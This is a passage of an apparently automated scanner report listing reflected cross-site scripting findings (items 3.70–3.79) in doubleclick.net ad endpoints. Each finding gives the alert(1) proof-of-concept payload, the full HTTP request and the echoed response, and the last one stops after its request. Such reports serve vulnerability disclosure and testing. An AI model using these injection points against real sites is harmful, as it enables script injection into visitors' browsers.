Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 365f4"-alert(1)-"953eb1f2ac7 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=365f4"-alert(1)-"953eb1f2ac7&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:05:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
00/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=365f4"-alert(1)-"953eb1f2ac7&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50
...[SNIP]...

3.70. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb3bf"-alert(1)-"51781714db8 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100bb3bf"-alert(1)-"51781714db8&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:06:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
64997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100bb3bf"-alert(1)-"51781714db8&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/ht
...[SNIP]...

3.71. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 257ed"-alert(1)-"07d6b0a1c33 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=257ed"-alert(1)-"07d6b0a1c33&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:08:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=257ed"-alert(1)-"07d6b0a1c33&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlCl
...[SNIP]...

3.72. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1502"-alert(1)-"5e7d2cb2fac was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001e1502"-alert(1)-"5e7d2cb2fac&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:04:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
94441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001e1502"-alert(1)-"5e7d2cb2fac&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.
...[SNIP]...

3.73. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [ra parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e515"-alert(1)-"3d7d685553c was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.2437e515"-alert(1)-"3d7d685553c&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:10:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.2437e515"-alert(1)-"3d7d685553c&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
v
...[SNIP]...

3.74. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e5b4"-alert(1)-"68037134f06 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A2e5b4"-alert(1)-"68037134f06&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:07:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
c%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A2e5b4"-alert(1)-"68037134f06&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=
...[SNIP]...

3.75. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a341"-alert(1)-"39b94f25674 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=5114431a341"-alert(1)-"39b94f25674&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 21:59:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/169/%2a/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=5114431a341"-alert(1)-"39b94f25674&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmo
...[SNIP]...

3.76. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eff5"-alert(1)-"d2ad32e2576 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=1755eff5"-alert(1)-"d2ad32e2576&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:04:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=1755eff5"-alert(1)-"d2ad32e2576&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA
...[SNIP]...

3.77. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f109"-alert(1)-"4d12fd2ad5e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=160477f109"-alert(1)-"4d12fd2ad5e&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 21:59:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/169/%2a/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=160477f109"-alert(1)-"4d12fd2ad5e&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports
...[SNIP]...

3.78. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8539"-alert(1)-"17e7812c6e was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50e8539"-alert(1)-"17e7812c6e&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:10:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6950



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50e8539"-alert(1)-"17e7812c6e&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var open
...[SNIP]...

3.79. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e22b"-alert(1)-"4bbc9e4800b was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=6e22b"-alert(1)-"4bbc9e4800b&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
